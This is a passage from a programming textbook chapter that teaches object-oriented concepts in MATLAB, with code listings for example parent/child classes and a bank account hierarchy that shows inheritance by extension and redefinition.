- Reused and extended, adding specific custom capabilities not found in the original module, but using all of the original capabilities
- Reused and redefined, replacing a few attributes of the general module by more specific definitions, while retaining all of the original characteristics

The OO paradigm emerged as the framework that made large, reliable software systems possible. Note that OO encompasses far more than the syntax of any particular language, and far more than its core concepts, which are touched briefly in this section of the book. OO is primarily a design issue. OO design takes advantage of the tenets and concepts of OO languages to produce good software system designs, from which good software systems can be built. Many books are available to students wishing to pursue this subject further. However, a book on computer science concepts would be incomplete without a serious treatment of, and some practical exposure to, OO concepts. As we study OO concepts and their MATLAB implementation,\(^1\) it should be in the light of realizing the power of these concepts, and their place in the development of significant software systems.

### 18.1.2 Definitions

In general, we will use the following definitions:

- **A class** is the generic description of something. For example, a Toyota Prius indicates the nature of the car and the fact that one must specify a color and body style, and defines the functional relationships between, for example, the speed and fuel consumption.
- **An object** is an instance of a class in the same way that one specific Toyota Prius is an instance or example of the Toyota Prius design, having a specific identification number, color and body style, and more concretely, its own values for its current location, speed, fuel contents, and so on.
- **An attribute** is a data component of the class definition that will have a specific value in an object of that class at a given time. For example, all cars have a speed, but you must examine a particular car to determine its current speed.
- **A method**, much like a MATLAB function, is a procedural abstraction attached to a class that enables manipulation of the attributes of a particular object. Unlike a MATLAB function, methods have access not only to their own workspace, but also to the attributes of the class of which they are a part.
- **Encapsulation** is actually the core of good OO design. It is the process of packaging attributes and methods in such a way that you define and control the interfaces through which outside users (other objects) can access the attributes of your objects.
- **Inheritance** is the characteristic that enables the reuse and/or extension of core facilities. It is the facility by which a general, core class can be extended to add more specific attributes and methods, perhaps redefining the behavior of a few existing methods, but retaining access to the original, unmodified behavior.
- **A parent class** is the class from which other classes inherit characteristics.
- **Child classes** are classes derived from parent classes by inheritance. Of course, grandchild classes can also inherit from child classes, and so on.

\(^1\) The MATLAB implementations in this text were designed to remain as close as possible to a style that permits ready translation to more conventional OO language implementations (Java, C++, or C#). Where possible, we will note typical Java implementations of the MATLAB software artifacts.
- **Polymorphism** is the ability to treat all the children of a common parent as if they were all instances of that parent. It has two important aspects, as follows:
  1. All objects that are children of a parent class must be treated collectively as if they were all instances of the parent
  2. Individually, the system must reach the specific child methods when called for

### 18.1.3 Concepts

Behavioral abstraction is the central concept in OO programming. In Section 3.2.1 we discussed data abstraction as the ability to group disparate data items as arrays or structures that permit us to discuss “the temperature readings for July” or “the information about that CD” without having to enumerate all the details. In Section 5.1 we also referred to functions as implementing procedural abstraction whereby we could collect a number of recurring instructions, group them, and invoke them without reiterating all the details. Behavioral abstraction combines these two abstractions, allowing us to encapsulate not only related data items, but also the operations that are legal to perform on those data items. In the terms defined above, we can visualize a class as the encapsulation of a number of attributes with the methods that operate on those attributes to describe the behavior of an object.

An abstract data type (ADT) is a technique for describing the general character of a class without descending into specifics. The format of an ADT does not have to be graphical—there are good textual techniques for accomplishing the same objective. The specific ADT format we will use in this text is shown in Figure 18.1, where the data defined for the class are enclosed in the box and the methods for operating on the data are identified by the rectangles. We will use this form to define the overall behavior of classes before diving into the detailed implementation.

### 18.1.4 MATLAB Observations

The basic MATLAB functionality we have already used exhibits some interesting behaviors.
Consider, for example, the plus operator, \( A + B \). Depending on the actual nature of \( A \) and \( B \), this might have very different effects. For example, if \( A \) is an array, its actual type (referred to in the MATLAB workspace window as its class) is `double`. MATLAB actually interprets \( A + B \) as `plus(A, B)`; in other words, it applies the plus method to the object \( A \) with \( B \) as the second parameter. Depending on the nature of \( B \), this operation may have very different results:

- If \( A \) is \( 1 \times 1 \) (really, a scalar value), the operation will succeed when \( B \) is just about anything.
- If \( A \) is any sized array, the operation will succeed only if \( B \) is either a scalar or the same size as \( A \).
- Otherwise, the operation will fail with an error message.

These seem to be obvious statements, but they are actually quite profound and fundamental to our understanding of OO. This means that what we have previously considered to be an “open collection” of numbers is actually a collection “protected from the world” by a set of methods that “understand” what can and cannot be done with the data (see Figure 18.2).

### 18.2 Categories of Classes

In general, classes fall into two categories: classes that model individual objects (physical or abstract), such as vehicles, bank accounts, or GUI widgets; and classes that model collections of things, such as arrays or queues. It is important to keep these model categories separate, but to provide for the fact that collection classes need to be able to hold objects of many different types—individual objects and other collection objects. For example, if we intended to model traffic flow in a city, we might begin by considering the city map as a collection of streets and intersections.
The role of a street object is to contain and organize the vehicles moving on that street; the role of an intersection object (which might temporarily contain vehicles) is primarily to move vehicles from one street to another. Since one of the attributes of each vehicle should be the route it is currently following, the intersection should query a vehicle to discover which direction it should turn. ### 18.2.1 Modeling Physical Things We talk generically about the vehicles on the streets. In general, a vehicle would have a size, heading, location, speed, and route plan. It would have a method for moving along a street, and perhaps a generic method for drawing the vehicle when necessary. Specific vehicles would have specific constraints—motorcycles might have a higher maximum speed, for example. If we were drawing the vehicles on the streets, each specific vehicle would also have its own specific drawing method. So a vehicle class would encapsulate the basic data about a specific vehicle with methods like `draw(...)` and `move(...)`. ### 18.2.2 Modeling Collections When we look closer at the behavior of vehicles on a street (excluding passing, accidents, and so on), they behave as if they are in a queue. They join at the back of the queue, and arrive in order at the intersection at the other end of the street. So the streets really are containers of collections of vehicles with a specific behavior that we might describe as a queue. Therefore, a queue class would encapsulate objects it currently contains with methods like `enqueue(...)` and `dequeue(...)`, as shown in Figure 18.1. In a totally different application, if we were, for example, emulating a Polish notation calculator, we would need a stack to hold the intermediate values. We might visualize a stack\(^4\) class `MStack`, as shown in Figure 18.3. By convention, we refer to the process of adding data to a queue as enqueuing and the process of adding data to a stack as pushing. 
We refer to removing data from queues and stacks as dequeuing and popping, respectively.

Finally, there are advanced processing applications that require a special kind of queue called a priority queue. Imagine, for example, a process for organizing print jobs where one does not have to wait for small print jobs to print while long print jobs are being processed. Jobs would be enqueued for printing, and small jobs would be put in the queue ahead of larger jobs. This is an example of a priority queue.

---

\(^4\) Actually, since MATLAB has a predefined stack class, we will name our stack class `MStack`.

### 18.2.3 Objects within Collections

A street will process each vehicle generically by traversing its queue contents, but the vehicle-specific characteristics will govern their actual behavior. In upcoming chapters we will discuss the MATLAB implementation of such a model that integrates objects with object collections; but first, we will separately consider modeling objects and collections with simple examples.

### 18.3 MATLAB Implementation

MATLAB does a credible job implementing the OO language characteristics detailed in Section 18.1. Consider the very simple pair of classes shown in Figure 18.4. Both the parent class, `Fred`, and the child class, `FredChild`, contain one data item and host one method named `add`. The parent `add` method adds the value provided to its local data storage. The child `add` method adds to its own data and to the parent’s data. The following paragraphs indicate in this context how MATLAB implements the OO characteristics enumerated in Section 18.1.

### 18.3.1 MATLAB Classes

In MATLAB a class is a collection of functions (the methods of that class) stored as M-files in a specific subdirectory of the current workspace. For example, if we were modeling the class named Fred illustrated in the figure, all of the public methods (those you want to be accessible from outside the class) must be stored in a directory named @Fred.
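To make this layout concrete, here is one possible on-disk arrangement for the `Fred` class used as the running example in this chapter. The constructor name is fixed by MATLAB; the other file names shown are taken from the methods discussed later in the chapter, and the exact set is an illustrative assumption:

```
work/                  % current directory, holding the test scripts
  @Fred/               % all public methods of class Fred
    Fred.m             % constructor (must match the class name)
    display.m          % shows an object when the semicolon is omitted
    char.m             % returns a string describing the object
    add.m              % a class-specific method
    private/           % utilities shared only by Fred's own methods
```

Any function placed directly in `@Fred` becomes callable from outside the class; anything in `private` is reachable only from Fred's own methods.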
There are two ways to withhold public access to methods. If you need a private utility for use by only one of Fred’s methods, it can be included as a local function inside that method definition file. Utilities to be shared by more than one method but not from outside the class can be stored in a subdirectory named private.

MATLAB requires the following methods to be present:

- A constructor named the same as the class (Fred in our example) that may contain parameters used to initialize the object and that returns the completed object.\(^5\) However, it must make provisions for two features: calling the constructor with no parameters and calling the constructor to copy another object of the same class—accomplished by calling the constructor with the object to copy as the only parameter. The Fred constructor is shown in Listing 18.1.
- A display(...) method that is used by MATLAB whenever an assignment is made to a variable of this class without the semicolon to suppress the display.
- A char(...) method that returns a string describing the content of this object. Typically, the display(...) method merely contains disp(char(...)), but this method also allows functions like fprintf(...) to display the object as a string.
- set and get methods for any attributes accessible by child classes.
- Other methods required by the class specification.

### 18.3.2 MATLAB Objects

An object in MATLAB is created in a test script or a method of another class by assigning to a variable a call to the constructor of the required class with or without initializing parameters. For example, `myFred = Fred` would create an object `myFred` with default values of its attributes. Having created the object, its methods are called by invoking them by name with `myFred` as the first parameter. For example, to display the object, one might use the following:

```matlab
fprintf('the object is %s\n', char(myFred));
```

---

\(^5\) Java constructors normally do not return the object—they just initialize its attributes.
\(^6\) Java enthusiasts might recognize this as toString() except that MATLAB does not automatically invoke char(...) if it is expecting a string but sees an object.

\(^7\) Most OO implementation languages use the “structure access” style for invoking methods on an object like: myFred.char().

### 18.3.3 MATLAB Attributes

Attributes in MATLAB are stored in a structure we will refer to as the attribute structure that actually becomes typed as the object. The structure is made into an object by casting its type in the class constructor. This is shown in Listing 18.1.

**Listing 18.1** Constructor for the Fred class

1. function frd = Fred(data)
2. % @Fred\Fred class constructor.
3. % frd = Fred(data) creates a Fred containing data
4. % could also be a copy constructor:
5. % newF = Fred(oldF) copies the old Fred oldF
6. if nargin == 0 % did the user provide data?
7. frd.value = 0; % set the attribute
8. frd = class(frd,'Fred'); % cast as a Fred
9. elseif isa(data, 'Fred') % copy constructor?
10. frd = data;
11. else
12. frd.value = data; % data provided
13. frd = class(frd,'Fred');
14. end

In Listing 18.1:
Line 1: The constructor for any class looks exactly like a function returning an object of that class.
Line 2: To indicate the purpose of this particular function, we include @Fred\ in the first comment line to indicate that this constructor should be stored in that directory.
Lines 3–5: Show the remainder of the documentation.
Line 6: If no arguments were provided, this is the default constructor that must populate the attributes of the class with default values. Since MATLAB uses default constructors internally, this logic must always be there.
Line 7: Sets the default contents of the attribute named value. Notice that at this point we have created a structure named frd.
Line 8: We change the data type of the structure from struct to Fred, thereby restricting external access to the attributes of any object.
Line 9: This could also be a copy constructor designed to make a copy of another object of type Fred. We detect this by checking the class of the parameter.
Line 10: Since MATLAB always passes by value, the data item is already a copy of the original object, so just return that.
Lines 12 and 13: This is the real constructor, which is very similar to the default constructor except the attribute is set to the data provided.

### 18.3.4 MATLAB Methods

A method in MATLAB is written like a function, is stored in the class folder, and obeys all the normal rules of functions. The object attributes are presented to the method as its first parameter (which is actually an attribute structure). If the method changes any attributes of the object, it is necessary to return the updated attribute structure to the calling program.

This is an ugly dilemma. Most conventional OOP languages implement method calls by treating the methods of a class like attributes of a structure, and allow the user to write calling code as follows:

```matlab
myObject = Fred(4);
myObject.add(3);
```

As a result, we would optimistically imagine that the value stored in `myObject` would be 7. However, MATLAB cannot invoke methods in this form because it has no mechanism for treating functions as attributes. Therefore, it must provide the object as a parameter (usually the first one) to a regular function call. Consequently, the above code has to be implemented as follows:

```matlab
myObject = Fred(4);
add(myObject, 3);
```

So we ask ourselves whether `myObject` now contains the value 7. Of course not, because the function `add(...)` received a copy of `myObject` and has no access to the original.
We would be tempted to concede defeat and write the example for a third time as follows, where the function has to return an updated copy of the original object: ```matlab myObject = Fred(4); myObject = add(myObject, 3); ``` Although this last approach works, at least from the user’s perspective, it is far removed from the original concept of an object as one with persistent data. Furthermore, it takes away the ability to easily return a result from an object method. Fortunately, there is a construct in MATLAB that allows the call `add(myObject, 3)` to tunnel back to the caller’s workspace and modify the original object. In this text we have chosen the tunneling back approach shown in Listing 18.2, which illustrates the code to add something to the data stored in an object of type `Fred`. After performing the addition, the following line: ```matlab assignin('caller', inputname(1), frd) ``` is the command that tunnels back. First it obtains the name of the variable provided to this method using `inputname(1)`, and then it assigns the updated attribute structure `frd` to that name in the caller’s workspace. In Listing 18.2: Line 1: Shows the function header with an object of class Fred as the first parameter. Lines 2 and 3: Show the documentation. Line 4: Modifies the copy of the original object. Line 5: Tunnels back to the caller’s workspace, finds the variable provided as the first parameter name, and copies our new object to that variable. ### 18.3.5 Encapsulation in MATLAB Classes **Encapsulation** is accomplished in MATLAB by storing all the methods for a class in the folder named for the class (@Fred in the example). ### 18.3.6 Inheritance in MATLAB Classes **Inheritance** is sometimes referred to as an “IS-A” relationship because it defines a child class that exhibits all the behavior of the parent class as well as its own unique characteristics. It is accomplished in the MATLAB constructor for the child class. 
A local variable is first initialized as an instance of the parent class. The class cast method that creates the new child object includes this parent instance as a third parameter. The end result of this manipulation is an additional attribute in the child class that has the same name as the parent class and contains a reference to the parent object. When the child class needs access to the methods of the parent,\(^8\) it refers to these methods by way of this reference. Listing 18.3 shows the code for the child constructor.

**Listing 18.3** Fred child constructor

1. function fc = FredChild(pd, cd)
2. % @FredChild class constructor.
3. % fc = FredChild(pd, cd) creates a FredChild whose parent value is pd, and local attribute is cd

---

\(^8\) MATLAB child classes cannot directly access the attributes of the parent. They are accessed and modified only by way of the parent’s set and get methods.

In Listing 18.3:
Lines 1–8: Show a typical header block for this constructor.
Line 9: When constructing a default child, we first construct a local parent object named `super` with default contents.
Line 10: We set the child data items to default values.
Line 11: We include the parent object in the class cast to establish the parent-child relationship. The actual result of including `super` is to establish another field in the `FredChild` structure named `Fred` whose content is a `Fred` object.
Lines 12 and 13: Show the copy constructor.
Line 15: The real constructor passes the `pd` parameter to create the parent object.
Line 16: Sets the child data field.
Line 17: As with the default constructor, we establish the parent-child link by passing the parent object to the class cast.

### 18.3.7 MATLAB Parent Classes

A **parent class** is the class from which other classes inherit characteristics.
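Only the header of Listing 18.3 is reproduced here. A sketch of the rest of the constructor body, assembled from the line notes above (the variable name `super` comes from the notes; the child attribute name `cdata` is borrowed from the child's `char(...)` method shown later), might look like the following. Treat it as a reconstruction, not the book's exact listing:

```matlab
function fc = FredChild(pd, cd)
% @FredChild class constructor (sketch reconstructed from the notes).
% fc = FredChild(pd, cd) creates a FredChild whose parent
%      value is pd, and local attribute is cd
if nargin == 0                          % default constructor
    super = Fred;                       % default parent object
    fc.cdata = 0;                       % default child data
    fc = class(fc, 'FredChild', super); % cast, linking the parent
elseif isa(pd, 'FredChild')             % copy constructor?
    fc = pd;
else
    super = Fred(pd);                   % build the parent from pd
    fc.cdata = cd;                      % set the child data field
    fc = class(fc, 'FredChild', super); % establish the parent link
end
```

The third argument to `class(...)` is what creates the extra `Fred`-named attribute in the child structure described in the notes.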
### 18.3.8 MATLAB Child Classes

**Child classes** are derived from parent classes by inheritance. Of course, grandchild classes can also inherit from child classes. A child class cannot directly access the attribute structure of its parent. However, it can access the methods of the parent class by way of an attribute with the name of the parent class.\(^9\)

---

\(^9\) Some OO languages permit child classes to inherit from more than one set of parents—a practice that can cause significant logical challenges. Other languages (Java, for one) enforce single inheritance chains, but provide alternate mechanisms (interfaces) for enforcing other common behaviors. We will see interface-like characteristics in our MATLAB code examples.

This logic needs careful study. Examine the diagram shown in Figure 18.5, the explanatory notes, and the code for the `add` method of the child class shown in Listing 18.4. Note that for illustrative purposes, this method is intended to add the provided data to the attributes of both parent and child. This method might be invoked in the following code:

```matlab
fc = FredChild(3, 6);
add(fc, 10);
```

Figure 18.5 illustrates the sequence of creation and access for these two “simple” operations. The notes below follow the figure callouts.

1. When a script creates an object, a structure whose class name is the name of the child class appears in the workspace. Its attributes are the local data values for the child object and a special attribute with the name of the parent class. That parent class attribute contains the parent data items defined for this object.
2. When a child method is called, since the parameters are passed by value, the numerical parameters are copied in directly.
3. The original object is copied into the workspace of the child method, so the child method is working on a copy of the original object.
4. The child method can directly modify those parts of the attribute structure that belong to that child.
5.
The child reaches the methods of the parent class via the attribute named for the parent class—in this case, `fch.Fred`. This attribute contains the attributes of the parent object that are defined for this child class. Because this parent structure is an attribute structure, it cannot be directly passed as a parameter to the parent’s methods. Rather, we must first extract a copy of the parent’s attribute structure.
6. We call the parent method with that copy, which modifies our local copy of the parent attributes.
7. Then, we put the copy of the parent attributes back into our local attribute structure.
8. Finally, since this method is also working with a copy of this object’s attributes, these updated attributes must be copied back to the caller.

In Listing 18.4:
Lines 1–4: Show a suitable header block for this method.
Line 5: Adds the value to the child’s data attribute.
Line 6: This line needs explanation. We really want to say the following:

```matlab
add(fc.Fred, value)
```

However, this will tunnel back to change the value of `fc.Fred`, and the addressing capability of `assignin(...)` is restricted to elementary variables; it cannot reach structure fields. So we have to extract the parent, add to it, and copy the result back to the parent.
Line 7: Adds to the parent’s attribute.
Line 8: Restores the local parent structure.
Line 9: Copies the result back to the caller.

### 18.3.9 Polymorphism in MATLAB

There are two crucial aspects of **polymorphism**:

1. All objects that are children of a parent class must be treated collectively as if they were all instances of the parent
2. Individually, the system must reach the specific child methods when called for.

MATLAB achieves the first very naturally because it ignores the type of all data until forced to operate on that data.
The power of this polymorphic approach is this: Throughout MATLAB, all data objects are self-aware—of their data type and the methods they can implement. Therefore, the second objective is achieved because when MATLAB calls a method on a particular object, it goes to the definition of that object for the method implementation.

A simple example might suffice. In the Fred class, in addition to the add and constructor methods discussed, we implemented a `display(...)` method and a `char(...)` method to show the contents of objects of type Fred. In the FredChild class there is no `display(...)` method, but there is a `char(...)` method to return the contents of this child and its parent class. Listing 18.5 shows a simple test script for a child class.

In Listing 18.5:
Lines 1 and 2: Show the typical beginning of a script.
Line 3: Shows an additional initializer to remove previous class definitions. If this is not present, for some reason MATLAB balks when you define a class you have previously defined.
Line 4: Creates an instance of the parent and, because the semicolon is missing, shows it by calling `display(...)` on the parent class. As shown in Listing 18.6, the `display(...)` method calls `char(...)` on this object (a parent class) that acts exactly like a `char` cast of the object, producing a character string.
Line 5: Creates and displays a child object. Note that this uses the display method on the parent because the child does not have one, but calls the `char(...)` method on the child. Note also that the child `char(...)` method invokes the parent's `char(...)` method.
Line 6: Changes the data in both parent and child by adding 10 to them.
Line 7: Displays the child again.

Listings 18.6, 18.7, and 18.8 show the parent display method and the `char` methods for the parent and child.
**Listing 18.5** Fred child test program

1. clear
2. clc
3. clear classes
4. f = Fred(20)
5. fc = FredChild(3, 6)
6. add(fc, 10)
7. fc

In Listing 18.6:

Lines 1 and 2: Show the typical header.
Line 3: Calls the \texttt{char(...)} method for whichever object is provided as a parameter, and passes the resulting string to the standard MATLAB \texttt{disp(...)} method.

In Listing 18.7:

Lines 1 and 2: Show the typical header.
Line 3: Creates a string using \texttt{sprintf(...)}, which incorporates the parent data attribute.

In Listing 18.8:

Lines 1 and 2: Show the typical header.
Line 3: Calls the \texttt{char(...)} method of the parent to retrieve that string, and then creates a string using \texttt{sprintf(...)}, which incorporates both child and parent data.

Listing 18.9 shows the results of the script in Listing 18.5.

**Listing 18.6** Parent's \texttt{display(...)} method

1. function display(frd)
2. % @Fred\display method
3. disp(char(frd))

**Listing 18.7** Parent's \texttt{char(...)} method

1. function str = char(frd)
2. % @Fred\char method
3. str = sprintf('Fred with %d', frd.value);

**Listing 18.8** Child's \texttt{char(...)} method

1. function str = char(frdc)
2. % @FredChild\char method
3. str = ...
       sprintf('FredChild with %d containing %s', ...
       frdc.cdata, char(frdc.Fred) );

**Listing 18.9** Results in the Command window

1. Fred with 20
2. FredChild with 6 containing Fred with 3
3.
FredChild with 16 containing Fred with 13

18.4 Example—Modeling Bank Accounts

The overall goal of this section is to show a slightly more practical model than the previous illustrations without having to write too much code, and then illustrate inheritance by extension, and by redefining a small part of the code. In particular, the emphasis will be on designing and gathering functionality in the parent class in order to minimize the amount of content in the child classes. We will first see the ADT and MATLAB model for a simple bank account class, and then consider two techniques for extending that class—using extension to model a savings account, and then using redefinition to model an overdraft-protected account.

18.4.1 The Base Class

Figure 18.6 illustrates the ADT for a basic BankAccount class. While there are a number of attributes of a real account associated with the identity and ownership of that account, we will keep things as simple as possible by considering just the balance on an account as the attribute of interest. The deposit and withdraw methods provide normal access to the account balance for external users. The getBalance and setBalance methods provide balance access for the derived classes. All of the following files will be stored in the folder @BankAccount except the test program, which should be in the work directory above the object directories. Listing 18.10 shows the constructor setting up the single attribute, the balance in the account. Listings 18.11, 18.12, 18.13, 18.14, 18.15, and 18.16 show the code for the methods identified in Figure 18.6 together with the standard display(...) and char(...) methods.

**Listing 18.10** BankAccount constructor

1. function acct = BankAccount(data)
2. % @BankAccount\BankAccount class constructor.
3. % ba = BankAccount(amt) creates a bank account with balance amt
4. % could also be a copy constructor:
5. % ba = BankAccount( oba ) copies the account oba

```
if nargin == 0
    acct.balance = 0;
    acct = class(acct,'BankAccount');
elseif isa(data, 'BankAccount')
    acct = data;
else
    acct.balance = data;
    acct = class(acct,'BankAccount');
end
```

Figure 18.6 ADT for the BankAccount class

In Listing 18.10:

- Lines 1–6: Show the constructor header.
- Lines 7–9: Show the default constructor.
- Lines 12–15: Show the real constructor.

In Listing 18.11:

- Lines 1 and 2: Show the method header.
- Line 3: Invokes the `setBalance(...)` method (Listing 18.14) to add the deposit to the current balance.
- Line 4: Returns the new object with the updated balance.

Access to important data like the balance of an account should go through access methods to allow for validation, writing audit trails, and so on to be added in a central location.

### Listing 18.11 The `BankAccount` deposit method

1. function deposit(acct, amount)
2. % @BankAccount\deposit to the account
3. setBalance(acct, acct.balance + amount);
4. assignin('caller', inputname(1), acct);

### Listing 18.12 The `BankAccount` withdraw method

1. function gets = withdraw(acct, amount)
2. % @BankAccount\withdraw from the account
3. gets = amount;
4. if gets > acct.balance
5.     gets = acct.balance;
6. end
7. setBalance(acct, acct.balance - gets);
8. assignin('caller', inputname(1), acct);

In Listing 18.12:

- Lines 1 and 2: Show the method header.
- Line 3: In a typical account, withdrawals are limited to the amount in the account. Consequently, we must limit the amount returned to the current balance. We initialize what the user gets to what he asked for.
- Lines 4–6: If this is more money than the user has, give him only the current balance.
- Line 7: Sets the new balance.
- Line 8: Updates the object.

In Listing 18.13:

- Lines 1 and 2: Show the method header.
- Line 3: Shows a simple process of extracting the balance from the object.
Although we do not need this method in the parent class, child classes do not have access to the parents' attributes and therefore must use this accessor.

In Listing 18.14:

Lines 1 and 2: Show the method header.
Line 3: Sets the balance to the given amount.
Line 4: Returns the object to the caller.

In Listing 18.15:

Lines 1–3: Show the method header.
Line 4: Invokes the char(...) method on the object provided. Every object could operate with the same display(...) method, if there were some way to accomplish this.

In Listing 18.16:

Lines 1–3: Show the method header.
Line 4: Creates a string representing the attributes of this object. This string should be sufficiently generic to enable its use by children classes.

Listing 18.17 shows a typical script to test the behavior of the BankAccount class.

In Listing 18.17:

Line 1: Creates a bank account with a $1,000 initial deposit. With no semicolon, the display(...) method is called to show the result.
Line 2: Shows the $20.11 deposit. Although there is no semicolon, this is not an assignment and therefore no output is generated.
Line 3: Shows the printout directly using the char(...) method to describe the object.
Line 4: Shows the $200 withdrawal from the account.
Line 5: Demonstrates that the amount was withdrawn and shows the remaining balance.

Listing 18.18 shows the result from running this test script.

**Listing 18.16** BankAccount char method

1. function s = char(ba)
2. % @BankAccount\char for the BankAccount class
3. % returns string representation of the account
4. s = sprintf('Account with $%.2f\n', ba.balance );

**Listing 18.17** BankAccount test script

1. moola = BankAccount(1000)
2. deposit(moola, 20.11)
3. fprintf('deposit 20.11 -> %s\n', char(moola) );
4. gets = withdraw(moola, 200);
5. fprintf('withdraw 200 -> $%.2f; %s\n', ...
gets, char(moola) ) Listing 18.18 Test results Account with $1000.00 deposit 20.11 -> Account with $1020.11 withdraw 200 -> $200.00; Account with $820.11 18.4.2 Inheritance by Extension Having invested significant effort in preparing the BankAccount class to be extended, writing a SavingsAccount class involves only the constructor and two methods. The SavingsAccount class will have all the characteristics of a BankAccount, plus the ability to calculate interest periodically. For simplicity, we will omit any time-sensitive calculations, and presume that the calcInterest is run only when appropriate. The interest will accumulate at a specified rate, and will be applied only if the account balance exceeds a given minimum balance. The SavingsAccount class and its parent are shown in Figure 18.7. The only new code needed will be for the constructor (Listing 18.19), the method that calculates the interest (Listing 18.20), and the char(...) method to display its content (Listing 18.21). Even that method will invoke the parent char(...) method for most of the work. All the following files except the test script must be stored in the directory @SavingsAccount. Notice the following important characteristics: - The calcInterest method does not have to specifically request the getBalance(...) method of the parent; because there is no getBalance method on this class, the parent supplies it. - Similarly, the test program merely invokes the deposit method. Since the SavingsAccount does not have one, the parent deposit method is used. - On the other hand, the char(...) method does need to invoke the parent char(...) method explicitly in order to avoid recursive behavior. - Perhaps most challenging, notice that there is no display(...) method in this class, so the parent's display(...) method is called. However, since it calls a char(...) method, we have to ask: Which char(...) method is invoked? The answer, of course, is that the SavingsAccount char(...) 
method is used because the object provided is a SavingsAccount first and a BankAccount second.

Figure 18.7 The SavingsAccount class

In Listing 18.19:

Lines 1–6: Show the constructor header.
Line 7: Detects the need for the default constructor logic.
Line 8: Creates a default parent object.
Lines 9 and 10: Set the default local attributes (constants in this example).
Line 11: Sets the class of the default object with the parent object included.
Lines 12 and 13: Show the copy constructor.
Lines 15–19: Show the real constructor, which differs only in passing the initial balance to the parent constructor.

In Listing 18.20:

Lines 1–3: Show the method header.
Line 4: You can earn interest only if your balance is above the specified minimum balance.
Line 5: Calculates the interest earned during this time period.
Line 7: No interest is earned on small balances.

In Listing 18.21:

Lines 1–3: Show the method header.
Line 4: Invokes the parent char(...) method for the balance information; this function adds only the account type. We could, of course, extend this to include the local attributes.

The code shown in Listing 18.22 tests the savings account logic.

In Listing 18.22:

Line 1: Creates a savings account with an initial deposit of $2,000. This calls the parent display(...) method.
Line 2: Invokes the parent's deposit method to add another $3,000.
Line 3: Displays this account information.
Line 4: Invokes our calcInterest(...) method.
Line 5: Deposits this interest back into the account.
Line 6: Shows the updated information.

The output from this test is shown in Listing 18.23.

### Listing 18.21 SavingsAccount char(...) method

1. function s = char(sa)
2. % @SavingsAccount\char for the SavingsAccount
3. % returns string representation of the account
4. s = sprintf( 'Savings %s', char(sa.BankAccount) );

### Listing 18.22 SavingsAccount tests

1. sa = SavingsAccount(2000)
2. deposit(sa, 3000);
3.
fprintf('deposit 3000 -> %s\n', char(sa) );
4. intrst = calcInterest(sa);
5. deposit(sa, intrst);
6. fprintf('deposit interest %.2f -> %s\n', ...
       intrst, char(sa) );

### Listing 18.23 SavingsAccount test results

Savings Account with $2000.00
deposit 3000 -> Savings Account with $5000.00
deposit interest 250.00 -> Savings Account with $5250.00

18.4.3 Inheritance by Redefinition

We now consider a further extension of the BankAccount family—a SavingsAccount with a guaranteed overdraft, as shown in Figure 18.8. Once overdraft privileges have been authorized, users of this account can withdraw as much as they want. Of course, if the resulting balance is negative, the bank applies an overdraft charge, thereby taking away even more money than is available. The coding for this account will follow the general guidelines used above—a new constructor (Listing 18.24), a method for permitting overdrafts to occur (Listing 18.25), and a new char(...) method (Listing 18.26). The data for this class will include a Boolean value indicating that overdraft has been approved for this particular account object. However, this account will also need its own withdraw method to implement the new withdrawal rules (Listing 18.27).

Figure 18.8 The DeluxSavingsAccount class

### Listing 18.24 DeluxSavingsAccount constructor

```matlab
function acct = DeluxSavingsAccount(data)
% DeluxSavingsAccount class constructor.
% ba = DeluxSavingsAccount(amt) creates an
%      account with balance amt
% could also be a copy constructor:
% ba = DeluxSavingsAccount( oda ) copies oda
if nargin == 0
    super = SavingsAccount;
    acct.overdraftOK = false;
    acct.OVERDRAFT_CHARGE = 20;
    acct = class(acct,'DeluxSavingsAccount', super);
elseif isa(data,'DeluxSavingsAccount')
    acct = data;
else
    super = SavingsAccount(data);
    acct.overdraftOK = false;
    acct.OVERDRAFT_CHARGE = 20;
    acct = class(acct,'DeluxSavingsAccount', super);
end
```

In Listing 18.24:

Lines 1–6: Show the constructor header.
Lines 7–11: Show the default constructor defining the local attributes.
Lines 12 and 13: Show the copy constructor.
Lines 15–18: Show the real constructor.

In Listing 18.25:

Lines 1–3: Show the method header.
Line 4: Sets the overdraft permission attribute to the value provided.
Line 5: Returns the updated object.

In Listing 18.26:

Lines 1–3: Show the method header.
Lines 4 and 5: Set the output string to 'OK' or 'off'.
Line 6: Creates the string.

In Listing 18.27:

Lines 3 and 4: Check to see if there is enough money, or if overdraft is allowed.
Lines 5–7: Either way, we can use the parent's withdraw method, but the parent object must be extracted and then replaced.
Line 9: Assumes that the penalty is $0. However, if the user is asking for more than the balance, the penalty amount applies. The balance is then updated using the parent's `getBalance(...)` and `setBalance(...)` methods, and the updated object is returned to the caller as usual.

**Listing 18.25** DeluxSavingsAccount allowOverdraft method

1. function allowOverdraft(acct, value)
2. % @DeluxSavingsAccount\allowOverdraft
3. % approve overdraft on DeluxSavingsAccount
4. acct.overdraftOK = value;
5. assignin('caller', inputname(1), acct);

**Listing 18.26** DeluxSavingsAccount char(...) method

1. function s = char(sa)
2. % @DeluxSavingsAccount\char method
3. % returns string representation of the account
4. if sa.overdraftOK, strng = 'OK';
5. else, strng = 'off'; end
6. s = sprintf( 'Delux %s with overdraft %s', ...
       char(sa.SavingsAccount), strng );

Notice the following observations: Like its predecessor, the `char(...)` method of the `DeluxSavingsAccount` class lets its parent classes generate much of the string, adding locally only the additional information. Also, the redefined `withdraw(...)` method invokes the parent's `withdraw(...)` method if it can, but changes the balance by way of its `get` and `set` methods when it has to.
In particular, observe that when it can use the parent `withdraw(...)` method, it only reaches back one level to the `SavingsAccount` parent. The fact that this parent does not implement `withdraw(...)` and passes the call to its parent is not a concern for this child class. Listing 18.28 shows a script to test the `DeluxSavingsAccount` class.

```plaintext
Listing 18.27 Redefined withdraw method

1. function gets = withdraw(acct, amount)
2. % @DeluxSavingsAccount\withdraw method
3. if (amount < getBalance(acct)) ...
4.         || ~acct.overdraftOK
5.     parent = acct.SavingsAccount;
6.     gets = withdraw(parent, amount);
7.     acct.SavingsAccount = parent;
8. else
9.     penalty = 0;
10.    if amount > getBalance(acct)
11.        penalty = acct.OVERDRAFT_CHARGE;
12.    end
13.    gets = amount;
14.    setBalance(acct, ...
           getBalance(acct) - amount - penalty);
15. end
16. assignin('caller', inputname(1), acct);

Listing 18.28 Testing the DeluxSavingsAccount

1. dsa = DeluxSavingsAccount(2000)
2. deposit(dsa, calcInterest(dsa) )
3. fprintf('deposit interest -> %s\n', char(dsa) );
4. gets = withdraw(dsa, 3000);
5. fprintf('try to get 3000 -> $%8.2f; %s\n', ...
       gets, char(dsa) )
